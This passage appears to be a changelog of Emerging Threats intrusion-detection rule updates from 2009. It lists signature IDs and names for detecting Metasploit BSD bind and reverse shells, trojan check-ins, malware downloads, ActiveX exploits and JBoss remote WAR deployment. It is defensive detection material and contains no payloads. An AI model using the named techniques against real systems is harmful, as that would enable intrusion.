        2010448 || ET CURRENT_EVENTS MALWARE Potential Malware Download, trojan zbot || url,doc.emergingthreats.net/2010448 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010449 || ET CURRENT_EVENTS MALWARE Potential Malware Download, exploit redirect || url,doc.emergingthreats.net/2010449 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010450 || ET TROJAN Potential Gemini/Fake AV Download URL Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Gemini || url,www.virustotal.com/analisis/c36e206c6dfe88345815da41c1b14b4f33a9636ad94dd46ce48f5b367f1c736c-1254242791
        2010451 || ET TROJAN Generic Dropper Post (FarmTime var)

     -> Added to emerging-sid-msg.map.txt (83):
        2010369 || ET WEB_CLIENT Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Symantec || url,doc.emergingthreats.net/2010369 || cve,2009-3033 || url,www.securityfocus.com/bid/37092 || url,securitytracker.com/alerts/2009/Nov/1023238.html
        2010370 || ET WEB_CLIENT ACTIVEX Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Function Call Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Symantec || url,doc.emergingthreats.net/2010370 || cve,2009-3033 || url,www.securityfocus.com/bid/37092 || url,securitytracker.com/alerts/2009/Nov/1023238.html
        2010371 || ET SCAN Amap TCP Service Scan Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Amap || url,doc.emergingthreats.net/2010371 || url,freeworld.thc.org/thc-amap/
        2010372 || ET SCAN Amap UDP Service Scan Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Amap || url,doc.emergingthreats.net/2010372 || url,freeworld.thc.org/thc-amap/
        2010373 || ET WEB_CLIENT Haihaisoft Universal Player ActiveX Control URL Property Buffer Overflow Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_HaiHaisoft || url,doc.emergingthreats.net/2010373 || url,www.securityfocus.com/bid/37151/info || url,www.shinnai.net/exploits/ZzLsi6TIfSuVPh1kPHmP.txt
        2010374 || ET WEB_CLIENT ACTIVEX Haihaisoft Universal Player ActiveX Control URL Property Buffer Overflow Function Call Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_HaiHaisoft || url,doc.emergingthreats.net/2010374 || url,www.securityfocus.com/bid/37151/info || url,www.shinnai.net/exploits/ZzLsi6TIfSuVPh1kPHmP.txt
        2010375 || ET EXPLOIT Possible Oracle Database Text Component ctxsys.drvxtabc.create_tables Remote SQL Injection Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Oracle || url,doc.emergingthreats.net/2010375 || cve,2009-1991 || url,www.securityfocus.com/bid/36748
        2010376 || ET CURRENT_EVENTS WU Malicious Spam Inbound || url,doc.emergingthreats.net/2010376 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_DHL
        2010377 || ET POLICY JBOSS/JMX 80 access from outside || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Jboss || url,doc.emergingthreats.net/2010377 || url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf || url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
        2010378 || ET POLICY JBOSS/JMX 8080 access from outside || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Jboss || url,doc.emergingthreats.net/2010378 || url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf || url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
        2010379 || ET WEB-APPS JBOSS/JMX REMOTE WAR deployment attempt (POST) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Jboss || url,doc.emergingthreats.net/2010379 || url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf || url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
        2010380 || ET WEB-APPS JBOSS/JMX REMOTE WAR deployment attempt (GET) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Jboss || url,doc.emergingthreats.net/2010380 || url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf || url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
        2010381 || ET TROJAN Bredolab Checkin || url,doc.emergingthreats.net/2010381 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab || url,threatexpert.com/report.aspx?md5=a5f94577d00d0306e4ef64bad30e5d37
        2010382 || ET TROJAN Fake AV GET || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab || url,doc.emergingthreats.net/2010382 || url,threatexpert.com/report.aspx?md5=8d1b47452307259f1e191e16ed23cd35
        2010383 || ET EXPLOIT METASPLOIT BSD Bind shell || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010383
        2010384 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010384
        2010385 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010385
        2010386 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010386
        2010387 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010387
        2010388 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 5) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010388
        2010389 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010389
        2010390 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010390
        2010391 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010391
        2010392 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010392
        2010393 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010393
        2010394 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010394
        2010395 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 5) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010395
        2010396 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010396
        2010397 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010397
        2010398 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010398
        2010399 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010399
        2010400 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 5) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010400
        2010401 || ET EXPLOIT METASPLOIT BSD Bind shell (PexFstEnvMov Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010401
        2010402 || ET EXPLOIT METASPLOIT BSD Bind shell (PexFstEnvMov Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010402
        2010403 || ET EXPLOIT METASPLOIT BSD Bind shell (JmpCallAdditive Encoded) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010403
        2010404 || ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010404
        2010405 || ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010405
        2010406 || ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010406
        2010407 || ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvSub Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010407
        2010408 || ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvSub Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010408
        2010409 || ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010409
        2010410 || ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010410
        2010411 || ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010411
        2010412 || ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010412
        2010413 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010413
        2010414 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010414
        2010415 || ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010415
        2010416 || ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010416
        2010417 || ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010417
        2010418 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010418
        2010419 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010419
        2010420 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010420
        2010421 || ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvMov Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010421
        2010422 || ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvMov Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010422
        2010423 || ET EXPLOIT METASPLOIT BSD Reverse shell (JmpCallAdditive Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010423
        2010424 || ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010424
        2010425 || ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010425
        2010426 || ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010426
        2010427 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (SPARC Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010427
        2010428 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (SPARC Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010428
        2010429 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010429
        2010430 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010430
        2010431 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010431
        2010432 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010432
        2010433 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010433
        2010434 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010434
        2010435 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (SPARC Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010435
        2010436 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (SPARC Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010436
        2010437 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010437
        2010438 || ET MALWARE Possible Malicious Applet Access (justexploit kit) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_Justexploit || url,doc.emergingthreats.net/2010438 || url,www.malwaredomainlist.com/forums/index.php?topic=3570.0
        2010439 || ET TROJAN Generic Trojan Checkin (UA VBTagEdit) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Generic.Malware || url,doc.emergingthreats.net/2010439
        2010440 || ET CURRENT_EVENTS MALWARE Potential Malware Download, flash-HQ-plugin.40000.exe || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,doc.emergingthreats.net/2010440 || url,malwareurl.com
        2010441 || ET TROJAN Possible Storm Variant HTTP Post (S) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Storm || url,doc.emergingthreats.net/2010441 || url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf || url,cyber.secdev.ca/2009/11/russian-malware-bundle
        2010442 || ET TROJAN Possible Storm Variant HTTP Post (U) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Storm || url,doc.emergingthreats.net/2010442 || url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf || url,cyber.secdev.ca/2009/11/russian-malware-bundle
        2010443 || ET CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus downloader (installer.1.exe) || url,doc.emergingthreats.net/2010443 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010444 || ET CURRENT_EVENTS MALWARE Potential Malware Download, pdf exploit || url,doc.emergingthreats.net/2010444 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010445 || ET CURRENT_EVENTS MALWARE Potential Malware Download, java exploit || url,doc.emergingthreats.net/2010445 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010446 || ET CURRENT_EVENTS MALWARE Potential Malware Download, loadjavad.php exploit || url,doc.emergingthreats.net/2010446 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010447 || ET CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus (IAInstall.exe) || url,doc.emergingthreats.net/2010447 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010448 || ET CURRENT_EVENTS MALWARE Potential Malware Download, trojan zbot || url,doc.emergingthreats.net/2010448 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010449 || ET CURRENT_EVENTS MALWARE Potential Malware Download, exploit redirect || url,doc.emergingthreats.net/2010449 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010450 || ET TROJAN Potential Gemini/Fake AV Download URL Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Gemini || url,www.virustotal.com/analisis/c36e206c6dfe88345815da41c1b14b4f33a9636ad94dd46ce48f5b367f1c736c-1254242791
        2010451 || ET TROJAN Generic Dropper Post (FarmTime var)

     -> Added to emerging-virus.rules (3):
        #by Mike Cox
        #by Jaime Blasco, updates by evilghost
        #by packet hack

     -> Added to emerging-web_server.rules (1):
        #by mex

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-drop-BLOCK.rules (2):
        #  VERSION 1728
        #  Generated 2009-11-25 10:21:29 EDT

     -> Removed from emerging-drop.rules (2):
        #  VERSION 1728
        #  Generated 2009-11-25 10:21:29 EDT

     -> Removed from emerging-sid-msg.map (123):
        2008357 || ET SCAN Amap Scannner Traffic Inbound || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Amap || url,doc.emergingthreats.net/2008357 || url,freeworld.thc.org/thc-amap/
        2404028 || ET DROP Known Bot C&C Server Traffic (group 29)  || url,www.shadowserver.org
        2405028 || ET DROP Known Bot C&C Traffic (group 29) - BLOCKING SOURCE || url,www.shadowserver.org
        2500544 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500545 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500546 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500547 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500548 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500549 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500550 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500551 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500552 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500553 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500554 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500555 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500556 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500557 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500558 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500559 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500560 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500561 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500562 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (282) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500563 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (282) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500564 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (283) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500565 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (283) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500566 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (284) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500567 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (284) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500568 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (285) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500569 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (285) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500570 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (286) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500571 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (286) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500572 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (287) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500573 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (287) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500574 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (288) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500575 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (288) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500576 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (289) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500577 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (289) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500578 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (290) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500579 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (290) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500580 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (291) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500581 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (291) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500582 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (292) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500583 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (292) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500584 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (293) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500585 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (293) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500586 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (294) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
